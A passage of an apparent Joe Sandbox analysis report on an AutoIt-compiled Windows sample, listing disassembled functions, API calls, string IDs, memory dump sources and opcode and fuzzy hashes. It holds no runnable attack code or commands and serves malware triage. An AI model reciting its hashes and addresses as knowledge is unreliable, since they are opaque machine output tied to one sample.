                                                                          • Instruction ID: 5bbbd00f68527462815950e50b2dc9f98d2211c1eac3d6b9b98a8ebed457faf1
                                                                          • Opcode Fuzzy Hash: a342b1dbba88cdabb59159ff07f56a42278b71ab65c62436c65c385edd7a4b8b
                                                                          • Instruction Fuzzy Hash: 3FA0113000020CEB8B022BA2EC08888BFACEA002A0B008022F80C800228B33A8A08A80
                                                                          Function 00350B3B Relevance: 1.3, Strings: 1, Instructions: 57COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: M
                                                                          • API String ID: 0-3664761504
                                                                          • Opcode ID: 95e67fea9ab11b45b91e8b9fa76b0705c0832e53fa217cf3a3ee75fe3cef4771
                                                                          • Instruction ID: 8d4f6312703bb2582c49e9076e32e6cb646415ea942a0ce1fc967d779349b9fd
                                                                          • Opcode Fuzzy Hash: 95e67fea9ab11b45b91e8b9fa76b0705c0832e53fa217cf3a3ee75fe3cef4771
                                                                          • Instruction Fuzzy Hash: E3116DD785D6C64FC7038B70ACA91C6BF70DB2618A34A08DBC882A74E3F4995507CB06
                                                                          Function 00328808 Relevance: .6, Instructions: 590COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 98a0b22aa3d0f9813275792d889ffecdb646fee112863f644977b810823ee090
                                                                          • Instruction ID: 1d9c3e00b8d093b8d1de31a31992a3f5cefc976599ec2290f2cfde885af9179c
                                                                          • Opcode Fuzzy Hash: 98a0b22aa3d0f9813275792d889ffecdb646fee112863f644977b810823ee090
                                                                          • Instruction Fuzzy Hash: 9B223430A05626CBDF3B8B28E49477CB7A5FB01304F2A846AD9468B996DF70DDD2C741
                                                                          Function 003321C5 Relevance: .3, Instructions: 345COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                          • Instruction ID: 45f664dd040c6f91856282b1ff029a82e3a48428224cef6e18072825c5365cbb
                                                                          • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                          • Instruction Fuzzy Hash: A7C174362051930ADF6F463A84B403FFAA15EA37B271B076DD8B3CB5D4EE20D965D620
                                                                          Function 003325FA Relevance: .3, Instructions: 341COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                          • Instruction ID: 144929ec21c14678dd699be10037f314b5d30283b226d6bdfc8dd17ed311baba
                                                                          • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                          • Instruction Fuzzy Hash: 23C163322051930ADF2F463AC4B413FBAA15EA37B2B1B176DD4B2DF1D5EE60C925D620
                                                                          Function 00331978 Relevance: .3, Instructions: 323COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                          • Instruction ID: d452b8ee3f9e9628da9db4ea987d82742e40ae59b25e1c138817978d10691936
                                                                          • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                          • Instruction Fuzzy Hash: 73C160322091930ADF6F463AC4B413EFAA15EA37B271B176DD4B3CB1D4EE20C965D620
                                                                          Function 012FA7A0 Relevance: .1, Instructions: 92COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1723027581.00000000012F7000.00000040.00000020.00020000.00000000.sdmp, Offset: 012F7000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_12f7000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                          • Instruction ID: 8894a027b7a61c6f798ec4fd12eab2c6989f7d46591b405a78a92c6ec2ee4f2c
                                                                          • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                          • Instruction Fuzzy Hash: 6141C171D1051CEBCF48CFADC991AAEFBF2AF88201F548299D516AB345D730AB41DB80
                                                                          Function 012FA630 Relevance: .0, Instructions: 35COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1723027581.00000000012F7000.00000040.00000020.00020000.00000000.sdmp, Offset: 012F7000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_12f7000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                          • Instruction ID: f679c028e3744427a2d348385fe4e901a0641838dcb24f360326c55d42df4211
                                                                          • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                          • Instruction Fuzzy Hash: 73014278A11109EFCB44DF98C5909AEF7F5FF88310F2085A9DA19A7741E730AE41DB80
                                                                          Function 012FA690 Relevance: .0, Instructions: 35COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1723027581.00000000012F7000.00000040.00000020.00020000.00000000.sdmp, Offset: 012F7000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_12f7000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                          • Instruction ID: b0319667ab6d795f3682c420220f3ea85f33eca3acb1307dbc0bd31715c8986b
                                                                          • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                          • Instruction Fuzzy Hash: 7A019278E11109EFCB44DF98C5909AEF7F5FB88310F2085A9D909A7301E730AE41DB80
                                                                          Function 012F9020 Relevance: .0, Instructions: 6COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1723027581.00000000012F7000.00000040.00000020.00020000.00000000.sdmp, Offset: 012F7000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_12f7000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                          • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                          • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                          • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                          Function 00387806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DeleteObject.GDI32(00000000), ref: 0038785B
                                                                          • DeleteObject.GDI32(00000000), ref: 0038786D
                                                                          • DestroyWindow.USER32 ref: 0038787B
                                                                          • GetDesktopWindow.USER32 ref: 00387895
                                                                          • GetWindowRect.USER32(00000000), ref: 0038789C
                                                                          • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 003879DD
                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 003879ED
                                                                          • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00387A35
                                                                          • GetClientRect.USER32(00000000,?), ref: 00387A41
                                                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00387A7B
                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00387A9D
                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00387AB0
                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00387ABB
                                                                          • GlobalLock.KERNEL32(00000000), ref: 00387AC4
                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00387AD3
                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00387ADC
                                                                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00387AE3
                                                                          • GlobalFree.KERNEL32(00000000), ref: 00387AEE
                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00387B00
                                                                          • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,003A2CAC,00000000), ref: 00387B16
                                                                          • GlobalFree.KERNEL32(00000000), ref: 00387B26
                                                                          • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00387B4C
                                                                          • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00387B6B
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00387B8D
                                                                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00387D7A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                          • String ID: $AutoIt v3$DISPLAY$static
                                                                          • API String ID: 2211948467-2373415609
                                                                          • Opcode ID: d3dfdfaa130db98f7e3a6ea964e3d50d1b6665be0e6a75a6eeb5a9d4e0262a75
                                                                          • Instruction ID: 61187f1ac47fa0a174a5e44a344a4fd0bf596d98591ea5ba11e5d8fbeb478d18
                                                                          • Opcode Fuzzy Hash: d3dfdfaa130db98f7e3a6ea964e3d50d1b6665be0e6a75a6eeb5a9d4e0262a75
                                                                          • Instruction Fuzzy Hash: 39026A71900205AFDB16EFA4DC89EAE7BB9EF48310F14855AF915EB2A0C771ED41CB60
                                                                          Function 0039356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CharUpperBuffW.USER32(?,?,0039F910), ref: 00393627
                                                                          • IsWindowVisible.USER32(?), ref: 0039364B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharUpperVisibleWindow
                                                                          • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                          • API String ID: 4105515805-45149045
                                                                          • Opcode ID: 903dfc8833614f67e2c812c8e7426c141675e0d78ea216a17c6c3e6ba9f8693c
                                                                          • Instruction ID: e919af0f2be81435d847f8f6cecb624c5e5c3fd6c3f22bbb714bec312745919d
                                                                          • Opcode Fuzzy Hash: 903dfc8833614f67e2c812c8e7426c141675e0d78ea216a17c6c3e6ba9f8693c
                                                                          • Instruction Fuzzy Hash: CAD181B42083019FCF06EF10C4A5BAE77A5AF99354F154459F8869F3A2CB31EE4ACB41
                                                                          Function 0039A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetTextColor.GDI32(?,00000000), ref: 0039A630
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 0039A661
                                                                          • GetSysColor.USER32(0000000F), ref: 0039A66D
                                                                          • SetBkColor.GDI32(?,000000FF), ref: 0039A687
                                                                          • SelectObject.GDI32(?,00000000), ref: 0039A696
                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 0039A6C1
                                                                          • GetSysColor.USER32(00000010), ref: 0039A6C9
                                                                          • CreateSolidBrush.GDI32(00000000), ref: 0039A6D0
                                                                          • FrameRect.USER32(?,?,00000000), ref: 0039A6DF
                                                                          • DeleteObject.GDI32(00000000), ref: 0039A6E6
                                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 0039A731
                                                                          • FillRect.USER32(?,?,00000000), ref: 0039A763
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0039A78E
                                                                            • Part of subcall function 0039A8CA: GetSysColor.USER32(00000012), ref: 0039A903
                                                                            • Part of subcall function 0039A8CA: SetTextColor.GDI32(?,?), ref: 0039A907
                                                                            • Part of subcall function 0039A8CA: GetSysColorBrush.USER32(0000000F), ref: 0039A91D
                                                                            • Part of subcall function 0039A8CA: GetSysColor.USER32(0000000F), ref: 0039A928
                                                                            • Part of subcall function 0039A8CA: GetSysColor.USER32(00000011), ref: 0039A945
                                                                            • Part of subcall function 0039A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0039A953
                                                                            • Part of subcall function 0039A8CA: SelectObject.GDI32(?,00000000), ref: 0039A964
                                                                            • Part of subcall function 0039A8CA: SetBkColor.GDI32(?,00000000), ref: 0039A96D
                                                                            • Part of subcall function 0039A8CA: SelectObject.GDI32(?,?), ref: 0039A97A
                                                                            • Part of subcall function 0039A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0039A999
                                                                            • Part of subcall function 0039A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0039A9B0
                                                                            • Part of subcall function 0039A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0039A9C5
                                                                            • Part of subcall function 0039A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0039A9ED
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                          • String ID:
                                                                          • API String ID: 3521893082-0
                                                                          • Opcode ID: 805327e6aae5a669ee8dbc29ba2aca40ee990cb4b8ed8df3285d94f13037b612
                                                                          • Instruction ID: 806f2b29da6ebfd5ad772705dbcc150db928c0565544720f263ed15a025ec59a
                                                                          • Opcode Fuzzy Hash: 805327e6aae5a669ee8dbc29ba2aca40ee990cb4b8ed8df3285d94f13037b612
                                                                          • Instruction Fuzzy Hash: 1A916E72008701EFDB129FA4DC48A5B7BADFF89321F114B2AF562D61A0D772D944CB92
                                                                          Function 00312C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DestroyWindow.USER32(?,?,?), ref: 00312CA2
                                                                          • DeleteObject.GDI32(00000000), ref: 00312CE8
                                                                          • DeleteObject.GDI32(00000000), ref: 00312CF3
                                                                          • DestroyIcon.USER32(00000000,?,?,?), ref: 00312CFE
                                                                          • DestroyWindow.USER32(00000000,?,?,?), ref: 00312D09
                                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 0034C43B
                                                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0034C474
                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0034C89D
                                                                            • Part of subcall function 00311B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00312036,?,00000000,?,?,?,?,003116CB,00000000,?), ref: 00311B9A
                                                                          • SendMessageW.USER32(?,00001053), ref: 0034C8DA
                                                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0034C8F1
                                                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0034C907
                                                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0034C912
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                          • String ID: 0
                                                                          • API String ID: 464785882-4108050209
                                                                          • Opcode ID: e49f572b39c12050524c5058cca9c2bfcb87b138cd6859bb698280bbac4022b7
                                                                          • Instruction ID: eb3201ecf27f83680845aa212de4dac91df1a5f21798893e372690cf094b8ed7
                                                                          • Opcode Fuzzy Hash: e49f572b39c12050524c5058cca9c2bfcb87b138cd6859bb698280bbac4022b7
                                                                          • Instruction Fuzzy Hash: 9A128C30611201EFDB56CF24C884BAABBE5FF09300F569569E995CF662CB31F891CB91
                                                                          Function 003874AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DestroyWindow.USER32(00000000), ref: 003874DE
                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0038759D
                                                                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 003875DB
                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 003875ED
                                                                          • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00387633
                                                                          • GetClientRect.USER32(00000000,?), ref: 0038763F
                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00387683
                                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00387692
                                                                          • GetStockObject.GDI32(00000011), ref: 003876A2
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 003876A6
                                                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 003876B6
                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003876BF
                                                                          • DeleteDC.GDI32(00000000), ref: 003876C8
                                                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 003876F4
                                                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 0038770B
                                                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00387746
                                                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0038775A
                                                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 0038776B
                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0038779B
                                                                          • GetStockObject.GDI32(00000011), ref: 003877A6
                                                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 003877B1
                                                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 003877BB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                          • API String ID: 2910397461-517079104
                                                                          • Opcode ID: d65f65548ea29b62a612f73139ad003c0a0e650fc0743d1ddfaeb4a04d795c08
                                                                          • Instruction ID: 7bdfb550317c73a07a7ef93ffb73ba9f0e8892eef8d3d1a064d05adf9474445c
                                                                          • Opcode Fuzzy Hash: d65f65548ea29b62a612f73139ad003c0a0e650fc0743d1ddfaeb4a04d795c08
                                                                          • Instruction Fuzzy Hash: 09A16FB1A40605BFEB15DBA4DC4AFAE7BADEB09710F108115FA14EB2E0C771AD00CB60
                                                                          Function 0037AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0037AD1E
                                                                          • GetDriveTypeW.KERNEL32(?,0039FAC0,?,\\.\,0039F910), ref: 0037ADFB
                                                                          • SetErrorMode.KERNEL32(00000000,0039FAC0,?,\\.\,0039F910), ref: 0037AF59
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
